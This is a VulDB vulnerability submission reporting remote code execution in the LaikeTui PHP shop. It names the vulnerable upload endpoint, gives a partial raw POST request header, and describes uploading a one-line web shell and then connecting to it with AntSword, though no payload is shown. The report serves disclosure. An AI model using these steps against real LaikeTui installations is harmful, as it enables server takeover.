| Título | The laiketui program has a remote code execution vulnerability |
|---|
| Descrição | php版本
路径:LKT/webapp/modules/api/actions/userAction.class.php
POST /LKT/index.php?module=api&action=user&m=upload HTTP/1.1
Host:
Accept: */*
Accept-Encoding: identity
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=--------------------------371918364269932091066326
这个url直接以multipart/form-data的post数据格式直接写入一句话木马,然后就会返回其文件名,然后antsword连接就可以 |
|---|
| Fonte | ⚠️ https://github.com/bettershop/LaikeTui |
|---|
| Utilizador | p1nk (UID 40417) |
|---|
| Submissão | 23/08/2023 21h01 (há 3 anos) |
|---|
| Moderação | 27/08/2023 08h15 (3 days later) |
|---|
| Estado | Aceite |
|---|
| Entrada VulDB | 238160 [Bettershop LaikeTui POST Request index.php?module=api&action=user&m=upload Elevação de Privilégios] |
|---|
| Pontos | 20 |
|---|